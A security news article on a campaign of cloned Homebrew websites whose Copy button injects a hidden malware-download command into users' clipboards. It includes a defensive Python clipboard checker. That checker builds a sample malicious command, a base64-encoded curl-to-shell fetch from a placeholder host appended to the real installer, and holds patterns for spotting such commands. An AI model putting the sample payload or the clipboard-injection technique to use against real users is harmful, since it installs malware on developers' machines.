Researchers from Kandji’s Threat Intelligence team uncovered a malware campaign targeting macOS users through spoofed Homebrew installer websites, cleverly crafted to mirror the official brew.sh homepage. The fake sites inject malicious payloads under the guise of legitimate installation commands — tricking developers into compromising their own machines.
Homebrew, a popular macOS package manager, has so far avoided the kind of supply-chain compromises that have plagued NPM and PyPI ecosystems. But Kandji warns that attackers are now bypassing the software supply chain entirely, instead focusing on users who follow online installation instructions.
“Kandji Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware… all resolving to 38[.]146[.]27[.]144. These domains showed a carbon copy of the real Homebrew webpage at brew.sh.”
Researchers identified at least four fake domains — including homebrewoneline[.]org — that replicate the appearance and layout of the official Homebrew site with near-perfect accuracy.
The malicious pages employ a social engineering trick that replaces the normal copy-paste installation process with a single “Copy” button, allowing attackers to inject hidden commands.
“Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard… which downloads a malicious payload in parallel with the Homebrew installer.”
This technique echoes a growing class of clipboard injection attacks, similar to the “ClickFix” social engineering campaign, where hidden payloads are embedded in copied shell commands.
Kandji’s team found that the cloned sites use embedded JavaScript to both restrict manual copying and log victim interactions. The script also includes Russian-language comments, revealing placeholders for attacker-defined payloads and data exfiltration mechanisms.
When the Copy button is clicked, the script sends a JSON payload containing click time and metadata to a notify.php endpoint — effectively logging every potential victim interaction for later analysis.
The same IP infrastructure hosting the fake Homebrew sites was previously linked to the Odyssey Stealer malware, which harvests credentials and browser data from infected macOS systems. Kandji’s analysis suggests that this spoofing campaign may be part of a larger, commodity-style threat operation.
“Combined with observed behavior of the same infrastructure downloading the Odyssey Stealer, the artifacts point to an active, commodity-style threat operation rather than a one-off.”
Before Kandji’s public disclosure, the sites were updated to include an active, base64-encoded cURL payload, confirming live deployment of the malicious installer.
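The defensive check a practitioner would want for the clipboard-injection pattern described above (a forced Copy button that appends a hidden, backgrounded command, later upgraded to a base64-encoded cURL payload) is to inspect what actually landed in the clipboard before pasting it into a terminal. The following is an added example written for this article, not Kandji's code and not part of the report: it flags chained or backgrounded commands, base64 tokens that decode to shell commands, invisible control characters, and download hosts other than the ones the real installer uses. The official Homebrew one-liner and the allow-listed hosts are assumed from Homebrew's own install page; the "malicious" sample is constructed here from the behaviour the article describes and uses the reserved `example.invalid` domain rather than any real infrastructure.

```python
import base64
import re
import subprocess

# Assumed allow-list: hosts the genuine Homebrew install one-liner talks to.
OFFICIAL_HOSTS = {"raw.githubusercontent.com", "brew.sh", "github.com"}

# Homebrew's published install command (assumed from brew.sh, not quoted in the article).
OFFICIAL_INSTALL = (
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
)

# Constructed sample of the pattern described in the article: the real command,
# a backgrounding '&', then a base64-encoded curl-to-shell payload. Not a real IoC.
_HIDDEN = base64.b64encode(b"curl -fsSL https://example.invalid/payload | sh").decode()
CONSTRUCTED_MALICIOUS = OFFICIAL_INSTALL + " & echo " + _HIDDEN + " | base64 -d | sh"

# Zero-width and bidirectional control characters that can hide text in a paste.
INVISIBLE = re.compile(r"[\u200b\u200c\u200d\u2060\ufeff\u202a-\u202e\u2066-\u2069]")
# Long runs of base64 alphabet, optionally padded.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_HOST = re.compile(r"https?://([^/\s\"']+)")
# ';', '&&', '||', a single '&' (background) or a pipe outside of quotes.
SEPARATORS = re.compile(r"(?:;|&&|\|\||(?<!&)&(?!&)|\|)")


def decode_base64_tokens(text):
    """Return every base64-looking token in text that decodes to printable UTF-8."""
    decoded = []
    for tok in B64_TOKEN.findall(text):
        try:
            s = base64.b64decode(tok, validate=True).decode("utf-8")
        except Exception:  # not valid base64, or not text: ignore
            continue
        if s.isprintable():
            decoded.append(s)
    return decoded


def analyze_install_command(text):
    """Return a list of findings for a pasted install command; empty means nothing flagged."""
    findings = []
    if INVISIBLE.search(text):
        findings.append("invisible or bidi control characters present")

    # The genuine one-liner is a single command; blank out quoted strings so the
    # "$(curl ...)" substitution does not trip the separator check, then look for chaining.
    unquoted = re.sub(r'"[^"]*"', '""', text)
    if SEPARATORS.search(unquoted):
        findings.append("multiple or backgrounded commands chained in one paste")

    decoded = decode_base64_tokens(text)
    for s in decoded:
        if re.search(r"\b(curl|wget|sh|bash|zsh|python3?)\b", s):
            findings.append(f"base64 token decodes to a command: {s!r}")

    if re.search(r"\bbase64\b.*\s(-d|-D|--decode)\b", text):
        findings.append("inline base64 decoding of a command")

    for host in URL_HOST.findall(text + " " + " ".join(decoded)):
        if host.lower() not in OFFICIAL_HOSTS:
            findings.append(f"download from non-official host: {host}")
    return findings


def read_clipboard():
    """macOS only: return the current clipboard text via pbpaste."""
    return subprocess.run(["pbpaste"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Run with no arguments to inspect the live clipboard before pasting into a terminal.
    for label, sample in (("official", OFFICIAL_INSTALL), ("constructed", CONSTRUCTED_MALICIOUS)):
        print(label, analyze_install_command(sample) or "no findings")
    try:
        print("clipboard", analyze_install_command(read_clipboard()) or "no findings")
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("clipboard: pbpaste not available on this system")
```

The separator check is the one that catches the variant the article describes: the hidden command runs "in parallel with the Homebrew installer", which in a shell means a `&` or a second command after the genuine one, neither of which the real one-liner contains. The base64 and host checks cover the later, encoded cURL stage.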
Kandji warns that developers are the prime target, as package managers like Homebrew are heavily used in enterprise development environments — often with administrative privileges and access to source code repositories.
The firm emphasizes that users should only install Homebrew from the official brew.sh domain and verify commands manually rather than relying on “Copy” buttons or one-liners from untrusted sources.